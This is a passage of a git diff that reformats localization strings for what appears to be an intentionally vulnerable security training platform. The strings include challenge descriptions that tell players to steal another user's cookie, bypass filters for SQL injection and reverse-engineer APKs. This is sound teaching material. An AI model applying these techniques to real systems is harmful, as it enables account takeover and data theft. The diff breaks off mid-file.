+badCrypto.message = Hey new customers. We're up and coming in the banking sector and would like to give you a free account. Just create an account and sign in here:
+badCrypto.signInNow = Sign in Now!
+badCrypto.signInNow.message = Use this form to sign into your account now!
+
+loginForm.holder = Account Holder:
+loginForm.password = Account Password:
+loginForm.signIn = Sign Into Bank Account
+
+form.loading = Loading...
+
+register.makeAccount = Register An Account!
+register.makeAccount.message = Use this form to register an account now!
+register.createAccount = Create Bank Account
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoStorage.properties b/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoStorage.properties
index ae843bbd0..c73378d45 100644
--- a/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoStorage.properties
+++ b/src/main/resources/i18n/challenges/insecureCryptoStorage/insecureCryptoStorage.properties
@@ -1,31 +1,36 @@
-insecureCryptoStorage.1.challengename=Insecure Cryptographic Storage Challenge 1
-insecureCryptoStorage.2.challengename=Insecure Cryptographic Storage Challenge 2
-insecureCryptoStorage.3.challengename=Insecure Cryptographic Storage Challenge 3
-insecureCryptoStorage.4.challengename=Insecure Crypto Storage Challenge 4
-insecureCryptoStorage.1.whatToDo=The result key has been encrypted to ensure that nobody can finish the challenge without knowing the secret key to decrypt it. However, the result key has been encrypted with a famous, but easily broken, Roman cipher. The Plain text is in English.
-insecureCryptoStorage.2.whatToDo=The result key has been encrypted to ensure that nobody can finish the challenge without knowing the secret key to decrypt it. The following form can be used to check if you have the correct result key.
-insecureCryptoStorage.2.checkKey=Check Result Key
-insecureCryptoStorage.2.hint=2D Encryption
-insecureCryptoStorage.2.commentedCode.1=Validate theKey:
-insecureCryptoStorage.2.commentedCode.2=Transform input:
-insecureCryptoStorage.2.commentedCode.3=Check result for validity
-insecureCryptoStorage.2.commentedCode.4=Output the "output" variable to the HTML for viewing
-insecureCryptoStorage.3.whatToDo=The result key to this level is the same as the encryption key used in the following sub application. Break the cipher and recover the encryption key! The result key is in all capital letters and is in English.
-insecureCryptoStorage.3.ciphertextToDecrypt=Cipher text to decrypt:
-insecureCryptoStorage.3.ciphertextExample=Cipher text Example
-insecureCryptoStorage.3.tryDecryptThis=Try to decrypt this:
-insecureCryptoStorage.4.whatToDo=If you can buy oranges for free you'll receive the key for this level!
-insecureCryptoStorage.4.shop=Super Fruit Shopping
-insecureCryptoStorage.4.shop.message.1=Hey customers: Due to a shipping mistake we are completely over stocked fruit. Use the coupon code
-insecureCryptoStorage.4.shop.message.2=or
-insecureCryptoStorage.4.shop.message.3=to get yours for free!!!
-insecureCryptoStorage.4.shop.picture=Picture
-insecureCryptoStorage.4.shop.cost=Cost
-insecureCryptoStorage.4.shop.quantity=Quantity
-insecureCryptoStorage.4.shop.howToShop=Please select how many things you would like to buy and click submit
-insecureCryptoStorage.4.shop.couponCode=Coupon Code:
-insecureCryptoStorage.4.shop.submit=Place Order
-insecureCryptoStorage.loading=Loading...
-insecureCryptoStorage.errorOccurred=An Error Occurred
-insecureCryptoStorage.decrypt=Decrypt
+insecureCryptoStorage.1.challengename = Insecure Cryptographic Storage Challenge 1
+insecureCryptoStorage.2.challengename = Insecure Cryptographic Storage Challenge 2
+insecureCryptoStorage.3.challengename = Insecure Cryptographic Storage Challenge 3
+insecureCryptoStorage.4.challengename = Insecure Crypto Storage Challenge 4
+
+insecureCryptoStorage.1.whatToDo = The result key has been encrypted to ensure that nobody can finish the challenge without knowing the secret key to decrypt it. However, the result key has been encrypted with a famous, but easily broken, Roman cipher. The Plain text is in English.
+
+insecureCryptoStorage.2.whatToDo = The result key has been encrypted to ensure that nobody can finish the challenge without knowing the secret key to decrypt it. The following form can be used to check if you have the correct result key.
+insecureCryptoStorage.2.checkKey = Check Result Key
+insecureCryptoStorage.2.hint = 2D Encryption
+insecureCryptoStorage.2.commentedCode.1 = Validate theKey:
+insecureCryptoStorage.2.commentedCode.2 = Transform input:
+insecureCryptoStorage.2.commentedCode.3 = Check result for validity
+insecureCryptoStorage.2.commentedCode.4 = Output the "output" variable to the HTML for viewing
+
+insecureCryptoStorage.3.whatToDo = The result key to this level is the same as the encryption key used in the following sub application. Break the cipher and recover the encryption key! The result key is in all capital letters and is in English.
+insecureCryptoStorage.3.ciphertextToDecrypt = Cipher text to decrypt:
+insecureCryptoStorage.3.ciphertextExample = Cipher text Example
+insecureCryptoStorage.3.tryDecryptThis = Try to decrypt this:
+
+insecureCryptoStorage.4.whatToDo = If you can buy oranges for free you'll receive the key for this level!
+insecureCryptoStorage.4.shop = Super Fruit Shopping
+insecureCryptoStorage.4.shop.message.1 = Hey customers: Due to a shipping mistake we are completely over stocked fruit. Use the coupon code
+insecureCryptoStorage.4.shop.message.2 = or
+insecureCryptoStorage.4.shop.message.3 = to get yours for free!!!
+insecureCryptoStorage.4.shop.picture = Picture
+insecureCryptoStorage.4.shop.cost = Cost
+insecureCryptoStorage.4.shop.quantity = Quantity
+insecureCryptoStorage.4.shop.howToShop = Please select how many things you would like to buy and click submit
+insecureCryptoStorage.4.shop.couponCode = Coupon Code:
+insecureCryptoStorage.4.shop.submit = Place Order
+
+insecureCryptoStorage.loading = Loading...
+insecureCryptoStorage.errorOccurred = An Error Occurred
+insecureCryptoStorage.decrypt = Decrypt
diff --git a/src/main/resources/i18n/challenges/mobile/brokenCrypto/brokenCrypto.properties b/src/main/resources/i18n/challenges/mobile/brokenCrypto/brokenCrypto.properties
index 20eba709a..0187da821 100644
--- a/src/main/resources/i18n/challenges/mobile/brokenCrypto/brokenCrypto.properties
+++ b/src/main/resources/i18n/challenges/mobile/brokenCrypto/brokenCrypto.properties
@@ -1,6 +1,10 @@
-challenge1.challengeName=Mobile Broken Crypto 1
-challenge1.para1=This App uses a deprecated encryption algorithm (DES) and breaks a vital rule of key management. The key is in the conversation. Decrypt the chat to get the key.
-challenge2.challengeName=Mobile Broken Crypto 2
-challenge2.para1=This App uses DES to encrypt it's chat however it's developers have implemented this poorly. The key is in the conversation. Decrypt the chat to get the key.
-challenge3.challengeName=Mobile Broken Crypto 3
-challenge3.para1=The key for this challenge can be found in the client side database. Get the key to pass this challenge.
+challenge1.challengeName = Mobile Broken Crypto 1
+challenge1.para1 = This App uses a deprecated encryption algorithm (DES) and breaks a vital rule of key management. The key is in the conversation. Decrypt the chat to get the key.
+
+
+challenge2.challengeName = Mobile Broken Crypto 2
+challenge2.para1 = This App uses DES to encrypt it's chat however it's developers have implemented this poorly. The key is in the conversation. Decrypt the chat to get the key.
+
+
+challenge3.challengeName = Mobile Broken Crypto 3
+challenge3.para1 = The key for this challenge can be found in the client side database. Get the key to pass this challenge.
diff --git a/src/main/resources/i18n/challenges/mobile/clientSideInjection/clientSideInjection.properties b/src/main/resources/i18n/challenges/mobile/clientSideInjection/clientSideInjection.properties
index 905a21a69..ec9333ec6 100644
--- a/src/main/resources/i18n/challenges/mobile/clientSideInjection/clientSideInjection.properties
+++ b/src/main/resources/i18n/challenges/mobile/clientSideInjection/clientSideInjection.properties
@@ -1,5 +1,8 @@
-challenge1.challengeName=Mobile Client Side Injection 1
-challenge1.para1=The App for this challenge uses sloppy filters in an attempt to thwart attackers. These filters can be easily bypassed. Login to get the key.
+challenge1.challengeName = Mobile Client Side Injection 1
+challenge1.para1 = The App for this challenge uses sloppy filters in an attempt to thwart attackers. These filters can be easily bypassed. Login to get the key.
+
+
//TODO
-challenge2.challengeName=Mobile Client Side Injection 2
-challenge2.para1=This App has an upgraded form of filtering. Bypass the filtering, and perform SQL Injection to sign in as a legitimate user.
+
+challenge2.challengeName = Mobile Client Side Injection 2
+challenge2.para1 = This App has an upgraded form of filtering. Bypass the filtering, and perform SQL Injection to sign in as a legitimate user.
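Review bot: The `//TODO` line kept as context in this hunk is not a comment in a `.properties` file. Only `#` and `!` start a comment line, so a standard Java properties loader would read it as a key named `//TODO` with an empty value, and that key ends up in the loaded bundle. The reformatting now sets it apart with blank lines, which makes it look even more like a comment. If it marks unfinished work on challenge 2, write it as `# TODO` followed by what is still to be done; if it is stale, remove the line.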
diff --git a/src/main/resources/i18n/challenges/mobile/insecureData/insecureDataStrings.properties b/src/main/resources/i18n/challenges/mobile/insecureData/insecureDataStrings.properties
index b1593e76e..d6e8dd35f 100644
--- a/src/main/resources/i18n/challenges/mobile/insecureData/insecureDataStrings.properties
+++ b/src/main/resources/i18n/challenges/mobile/insecureData/insecureDataStrings.properties
@@ -1,6 +1,9 @@
-challenge1.challengeName=Mobile Insecure Data Storage 1
-challenge1.para1=The App for this challenge stores user credentials within a database, the data has not been stored in plain text but it also has not been encrypted. Make the credentials readable to get the key. The key is the Admin's password.
-challenge2.challengeName=Mobile Insecure Data Storage 2
-challenge2.para1=The App for this challenge, InsecureData2 uses a hashing algorithm on stored user credentials. However, there are two issues here, firstly the user is using a bad password. Secondly, the App does not use a salt when hashing the data. The result key to this challenge is the user's password.
-challenge3.challengeName=Mobile Insecure Data Storage 3
-challenge3.para1=Not all Apps will use sqlite to store user data, in some cases SharedPreferences is used. The key to this level can be gained once you log in as a legitimate user.
+challenge1.challengeName = Mobile Insecure Data Storage 1
+challenge1.para1 = The App for this challenge stores user credentials within a database, the data has not been stored in plain text but it also has not been encrypted. Make the credentials readable to get the key. The key is the Admin's password.
+
+challenge2.challengeName = Mobile Insecure Data Storage 2
+challenge2.para1 = The App for this challenge, InsecureData2 uses a hashing algorithm on stored user credentials. However, there are two issues here, firstly the user is using a bad password. Secondly, the App does not use a salt when hashing the data. The result key to this challenge is the user's password.
+
+
+challenge3.challengeName = Mobile Insecure Data Storage 3
+challenge3.para1 = Not all Apps will use sqlite to store user data, in some cases SharedPreferences is used. The key to this level can be gained once you log in as a legitimate user.
diff --git a/src/main/resources/i18n/challenges/mobile/poorAuthentication/poorAuthentication.properties b/src/main/resources/i18n/challenges/mobile/poorAuthentication/poorAuthentication.properties
index e57c67201..df8582827 100644
--- a/src/main/resources/i18n/challenges/mobile/poorAuthentication/poorAuthentication.properties
+++ b/src/main/resources/i18n/challenges/mobile/poorAuthentication/poorAuthentication.properties
@@ -1,2 +1,2 @@
-challenge1.challengeName=Poor Authentication 1
-challenge1.para1=You must log into the App PoorAuthentication1.apk to get the key. The Username and Password have been saved but this App uses a specially generated Authentication Code.
+challenge1.challengeName = Poor Authentication 1
+challenge1.para1 = You must log into the App PoorAuthentication1.apk to get the key. The Username and Password have been saved but this App uses a specially generated Authentication Code.
diff --git a/src/main/resources/i18n/challenges/mobile/reverseEngineer/reverseEngineer.properties b/src/main/resources/i18n/challenges/mobile/reverseEngineer/reverseEngineer.properties
index fef451d1b..ed16354dd 100644
--- a/src/main/resources/i18n/challenges/mobile/reverseEngineer/reverseEngineer.properties
+++ b/src/main/resources/i18n/challenges/mobile/reverseEngineer/reverseEngineer.properties
@@ -1,6 +1,8 @@
-challenge1.challengeName=Mobile Reverse Engineer 1
-challenge1.para1=This key to this challenge is the App author's name. Find it to complete the challenge.
-challenge2.challengeName=Mobile Reverse Engineer 2
-challenge2.para1=When an attacker reverse engineers an APK, they usually find multiple packages containing multiple activities, containing multiple methods which have all been obfuscated to crawl through. The key for this challenge has been hard coded into the APK for this challenge. To get to the key reverse engineer the APK and find the correct Activity which performs a conditional statement to check the validity of the key.
-challenge3.challengeName=Mobile Reverse Engineer 3
-challenge3.para1=The developers of this App, ReverseEngineer3, have decided to use an algorithm to confirm or deny the authenticity of the key. You must Reverse Engineer ReverseEngineer3.APK to find this algorithm. If you are unsure whether or not the key is correct, there is a key validity checker in the App.
\ No newline at end of file
+challenge1.challengeName = Mobile Reverse Engineer 1
+challenge1.para1 = This key to this challenge is the App author's name. Find it to complete the challenge.
+
+challenge2.challengeName = Mobile Reverse Engineer 2
+challenge2.para1 = When an attacker reverse engineers an APK, they usually find multiple packages containing multiple activities, containing multiple methods which have all been obfuscated to crawl through. The key for this challenge has been hard coded into the APK for this challenge. To get to the key reverse engineer the APK and find the correct Activity which performs a conditional statement to check the validity of the key.
+
+challenge3.challengeName = Mobile Reverse Engineer 3
+challenge3.para1 = The developers of this App, ReverseEngineer3, have decided to use an algorithm to confirm or deny the authenticity of the key. You must Reverse Engineer ReverseEngineer3.APK to find this algorithm. If you are unsure whether or not the key is correct, there is a key validity checker in the App.
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/mobile/unintendedDataLeakage/dataLeakage.properties b/src/main/resources/i18n/challenges/mobile/unintendedDataLeakage/dataLeakage.properties
index 5a6eee12d..7e3ca6982 100644
--- a/src/main/resources/i18n/challenges/mobile/unintendedDataLeakage/dataLeakage.properties
+++ b/src/main/resources/i18n/challenges/mobile/unintendedDataLeakage/dataLeakage.properties
@@ -1,4 +1,5 @@
-challenge1.challengeName=Unintended Data Leakage 1
-challenge1.para1=Log in as the user of this App to get the key for this challenge. Some data has been logged but it is up to the attacker to know what to do with this data.
-challenge2.challengeName=Unintended Data Leakage 2
-challenge2.para1=This App is leaking logs. The Key is the winning lotto number!
\ No newline at end of file
+challenge1.challengeName = Unintended Data Leakage 1
+challenge1.para1 = Log in as the user of this App to get the key for this challenge. Some data has been logged but it is up to the attacker to know what to do with this data.
+
+challenge2.challengeName = Unintended Data Leakage 2
+challenge2.para1 = This App is leaking logs. The Key is the winning lotto number!
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/poorValidation/poorValidationStrings.properties b/src/main/resources/i18n/challenges/poorValidation/poorValidationStrings.properties
index a302f8ebf..89aea5c7b 100644
--- a/src/main/resources/i18n/challenges/poorValidation/poorValidationStrings.properties
+++ b/src/main/resources/i18n/challenges/poorValidation/poorValidationStrings.properties
@@ -1,12 +1,14 @@
-poorValidation.1.challengeName=Poor Validation One
-poorValidation.2.challengeName=Poor Validation Two
-poorValidation.whatToDo=If you can buy oranges for free you'll receive the key for this level!
-poorValidation.shopping=Super Fruit Shopping
-poorValidation.shopping.whatToDo=Use this shop to buy whatever fruit you like!
-poorValidation.howToShop=Please select how many items you would like to buy and click submit
-poorValidation.picture=Picture
-poorValidation.cost=Cost
-poorValidation.quantity=Quantity
-poorValidation.placeOrder=Place Order
-poorValidation.loading=Loading...
-error.occurred=An Error Occurred
\ No newline at end of file
+poorValidation.1.challengeName = Poor Validation One
+poorValidation.2.challengeName = Poor Validation Two
+
+poorValidation.whatToDo = If you can buy oranges for free you'll receive the key for this level!
+poorValidation.shopping = Super Fruit Shopping
+poorValidation.shopping.whatToDo = Use this shop to buy whatever fruit you like!
+poorValidation.howToShop = Please select how many items you would like to buy and click submit
+poorValidation.picture = Picture
+poorValidation.cost = Cost
+poorValidation.quantity = Quantity
+poorValidation.placeOrder = Place Order
+poorValidation.loading = Loading...
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/securityMisconfig/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4.properties b/src/main/resources/i18n/challenges/securityMisconfig/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4.properties
index 581d6d7c1..9e43ecbb1 100644
--- a/src/main/resources/i18n/challenges/securityMisconfig/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4.properties
+++ b/src/main/resources/i18n/challenges/securityMisconfig/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4.properties
@@ -1,8 +1,10 @@
-securityMisconfig.stealTokens.challengeName=Security Misconfiguration Cookie Flag Challenge
-securityMisconfig.stealTokens.description=To complete this challenge, you must steal the securityMisconfigLesson cookie of another user. The administrators of the sub application have misconfigured the mechanism which enforces cookie security flags. The cookie set in this lesson has not been given the "secure" flag. This means that in any HTTP requests to the lesson will include this cookie. Even though the application (If Shepherd has been correctly configured) redirects to a HTTPs service upon access, the will have been sent across the network in plain text. When players open this lesson, they automatically send a HTTP request thanks to the following <IMG> element. Image elements do not follow the mixed content policy and will send HTTP requests even when loaded inside a HTTPs context. This will not work with an iFrame.
-securityMisconfig.stealTokens.whyThisImageIsHere=This Image has sent your securityMisconfigLesson across the network in plain text
-securityMisconfig.stealTokens.haveSomebodyOnYourNetwork=If there are no users on your local network, this lesson is very difficult to complete. Please ask your Shepherd Administrator to disable it.
-securityMisconfig.stealTokens.stealTokenThenDoThis=Once you have stolen another user's securityMisconfigLesson token, click the following button and sub in the other user's token where your own exists.
-form.securityMisconfig.stealTokens.submit=Get Result Key
-form.challenge.loading=Loading...
-error.occurred=An Error Occurred
\ No newline at end of file
+securityMisconfig.stealTokens.challengeName = Security Misconfiguration Cookie Flag Challenge
+securityMisconfig.stealTokens.description = To complete this challenge, you must steal the securityMisconfigLesson cookie of another user. The administrators of the sub application have misconfigured the mechanism which enforces cookie security flags. The cookie set in this lesson has not been given the "secure" flag. This means that in any HTTP requests to the lesson will include this cookie. Even though the application (If Shepherd has been correctly configured) redirects to a HTTPs service upon access, the will have been sent across the network in plain text. When players open this lesson, they automatically send a HTTP request thanks to the following <IMG> element. Image elements do not follow the mixed content policy and will send HTTP requests even when loaded inside a HTTPs context. This will not work with an iFrame.
+securityMisconfig.stealTokens.whyThisImageIsHere = This Image has sent your securityMisconfigLesson across the network in plain text
+securityMisconfig.stealTokens.haveSomebodyOnYourNetwork = If there are no users on your local network, this lesson is very difficult to complete. Please ask your Shepherd Administrator to disable it.
+securityMisconfig.stealTokens.stealTokenThenDoThis = Once you have stolen another user's securityMisconfigLesson token, click the following button and sub in the other user's token where your own exists.
+
+form.securityMisconfig.stealTokens.submit = Get Result Key
+form.challenge.loading = Loading...
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80.properties b/src/main/resources/i18n/challenges/sessionManagement/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80.properties
index 2a46bfbe2..686a641d4 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80.properties
@@ -1,13 +1,16 @@
-challenge.challengeName=Session Management Challenge Seven
-challenge.description=To complete this challenge you must sign in as one of the users with an privileged user role.
-challenge.form.userName=User Name:
-challenge.form.password=Password:
-challenge.form.signIn=Sign In
-challenge.form.forgotPassword=Have you forgotten your password?
-challenge.form.loading=Loading...
-question.header=Log In with via Security Question
-question.whatToDo=Please enter your email address to retrieve your Security Question;
-question.form.getQuestion=Get Security Question
-question.form.giveAnswer=Submit Answer
-clue.1=Answer Controller
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Seven
+challenge.description = To complete this challenge you must sign in as one of the users with an privileged user role.
+challenge.form.userName = User Name:
+challenge.form.password = Password:
+challenge.form.signIn = Sign In
+challenge.form.forgotPassword = Have you forgotten your password?
+challenge.form.loading = Loading...
+
+question.header = Log In with via Security Question
+question.whatToDo = Please enter your email address to retrieve your Security Question;
+question.form.getQuestion = Get Security Question
+question.form.giveAnswer = Submit Answer
+
+clue.1 = Answer Controller
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334.properties b/src/main/resources/i18n/challenges/sessionManagement/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334.properties
index 7a0c7c9f5..c68b1a0b7 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334.properties
@@ -1,8 +1,9 @@
-challenge.challengeName=Session Management Challenge Eight
-challenge.description=Only highly privileged
-challenge.description.2=users of the following sub-application can retrieve the result key.
-challenge.comment=Sorry Player, No Hints on the specific name of the privileged role in this challenge
-challenge.privilegedButton=Privileged User Only Button
-challenge.form.forgotPassword=Have you forgotten your password?
-challenge.form.loading=Loading...
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Eight
+challenge.description = Only highly privileged
+challenge.description.2 = users of the following sub-application can retrieve the result key.
+challenge.comment = Sorry Player, No Hints on the specific name of the privileged role in this challenge
+challenge.privilegedButton = Privileged User Only Button
+challenge.form.forgotPassword = Have you forgotten your password?
+challenge.form.loading = Loading...
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1.properties b/src/main/resources/i18n/challenges/sessionManagement/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1.properties
index a45f49a26..89fb928de 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1.properties
@@ -1,14 +1,17 @@
-challenge.challengeName=Session Management Challenge Five
-challenge.description=Only an account with admin privileges in the following sub-application can retrieve the result key to this challenge.
-challenge.form.userName=User Name:
-challenge.form.password=Password:
-challenge.form.signIn=Sign In
-challenge.form.forgotPassword=Forgotten Password?
-challenge.form.loading=Loading...
-change.header=Get Change Password Email
-change.whatToDo=Please enter your user name to have your password reset link for this sub application send to your email address. Please click the link in the email quickly as tokens automatically expire after a few minutes
-change.form.sendEmail=Send Email
-clue.1=Reset Password Form
-clue.2=Change Password Form (Requires Valid Token)
-clue.3=Token life is 10 mins
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Five
+challenge.description = Only an account with admin privileges in the following sub-application can retrieve the result key to this challenge.
+challenge.form.userName = User Name:
+challenge.form.password = Password:
+challenge.form.signIn = Sign In
+challenge.form.forgotPassword = Forgotten Password?
+challenge.form.loading = Loading...
+
+change.header = Get Change Password Email
+change.whatToDo = Please enter your user name to have your password reset link for this sub application send to your email address. Please click the link in the email quickly as tokens automatically expire after a few minutes
+change.form.sendEmail = Send Email
+
+clue.1 = Reset Password Form
+clue.2 = Change Password Form (Requires Valid Token)
+clue.3 = Token life is 10 mins
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece.properties b/src/main/resources/i18n/challenges/sessionManagement/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece.properties
index d7d4d9782..c13631676 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece.properties
@@ -1,13 +1,16 @@
-challenge.challengeName=Session Management Challenge Six
-challenge.description=To complete this challenge you must sign in as one of the users with an privileged user role.
-challenge.form.userName=User Name:
-challenge.form.password=Password:
-challenge.form.signIn=Sign In
-challenge.form.forgotPassword=Have you forgotten your password?
-challenge.form.loading=Loading...
-question.header=Log In with via Security Question
-question.whatToDo=Please enter your email address to retrieve your Security Question;
-question.form.getQuestion=Get Security Question
-question.form.giveAnswer=Submit Answer
-clue.1=Answer Controller
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Six
+challenge.description = To complete this challenge you must sign in as one of the users with an privileged user role.
+challenge.form.userName = User Name:
+challenge.form.password = Password:
+challenge.form.signIn = Sign In
+challenge.form.forgotPassword = Have you forgotten your password?
+challenge.form.loading = Loading...
+
+question.header = Log In with via Security Question
+question.whatToDo = Please enter your email address to retrieve your Security Question;
+question.form.getQuestion = Get Security Question
+question.form.giveAnswer = Submit Answer
+
+clue.1 = Answer Controller
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7.properties b/src/main/resources/i18n/challenges/sessionManagement/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7.properties
index 6f7c20ee1..5addcf172 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7.properties
@@ -1,11 +1,13 @@
-challenge.challengeName=Session Management Challenge Two
-challenge.description=Only an admin of the following sub-application can retrieve the result key to this challenge.
-challenge.form.userName=User Name:
-challenge.form.password=Password:
-challenge.form.signIn=Sign In
-challenge.form.forgotPass=Have you forgotten your password?
-challenge.form.loading=Loading...
-reset.header=Reset Password
-reset.whatToDo=Please enter your email address. You will be sent an email with a new temporary password
-reset.requestSent=Password reset request sent.
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Two
+challenge.description = Only an admin of the following sub-application can retrieve the result key to this challenge.
+challenge.form.userName = User Name:
+challenge.form.password = Password:
+challenge.form.signIn = Sign In
+challenge.form.forgotPass = Have you forgotten your password?
+challenge.form.loading = Loading...
+
+reset.header = Reset Password
+reset.whatToDo = Please enter your email address. You will be sent an email with a new temporary password
+reset.requestSent = Password reset request sent.
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a.properties b/src/main/resources/i18n/challenges/sessionManagement/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a.properties
index 7004d24ed..fd3831b1a 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a.properties
@@ -1,5 +1,6 @@
-challenge.challengeName=Session Management Challenge One
-challenge.description=Only administrators of the following sub-application can retrieve the result key.
-challenge.form.adminButton=Administrator Only Button
-challenge.form.loading=Loading...
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge One
+challenge.description = Only administrators of the following sub-application can retrieve the result key.
+challenge.form.adminButton = Administrator Only Button
+challenge.form.loading = Loading...
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6.properties b/src/main/resources/i18n/challenges/sessionManagement/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6.properties
index ff44c8a56..66f39157f 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6.properties
@@ -1,6 +1,7 @@
-challenge.challengeName=Session Management Challenge Four
-challenge.description=Only an admin of the following sub-application can retrieve the result key.
-challenge.form.adminButton=Admin Only Button
-challenge.form.loading=Loading...
-challenge.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Four
+challenge.description = Only an admin of the following sub-application can retrieve the result key.
+challenge.form.adminButton = Admin Only Button
+challenge.form.loading = Loading...
+challenge.hint = Would you like a hint?
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3.properties b/src/main/resources/i18n/challenges/sessionManagement/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3.properties
index 66f16c881..e955d2655 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3.properties
@@ -1,16 +1,18 @@
-challenge.challengeName=Session Management Challenge Three
-challenge.description=Only an admin of the following sub-application can retrieve the result key to this challenge. You have been granted user privileges because the admins need somebody to boss around.
-challenge.form.userName=User Name:
-challenge.form.password=Password:
-challenge.form.signIn=Sign In
-challenge.form.userFunctions=Toggle user functions
-challenge.form.loading=Loading...
-reset.header=Change Password
-reset.whatToDo=Please enter your new password for this sub application!
-reset.form.new=New Password:
-reset.form.confirm=Confirm Password:
-reset.form.changePass=Change Password
-reset.requestSent=Password reset request sent.
-error.occurred=An Error Occurred
-error.tooShort=Password is too short!
-error.noMatch=Passwords don't match!
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Three
+challenge.description = Only an admin of the following sub-application can retrieve the result key to this challenge. You have been granted user privileges because the admins need somebody to boss around.
+challenge.form.userName = User Name:
+challenge.form.password = Password:
+challenge.form.signIn = Sign In
+challenge.form.userFunctions = Toggle user functions
+challenge.form.loading = Loading...
+
+reset.header = Change Password
+reset.whatToDo = Please enter your new password for this sub application!
+reset.form.new = New Password:
+reset.form.confirm = Confirm Password:
+reset.form.changePass = Change Password
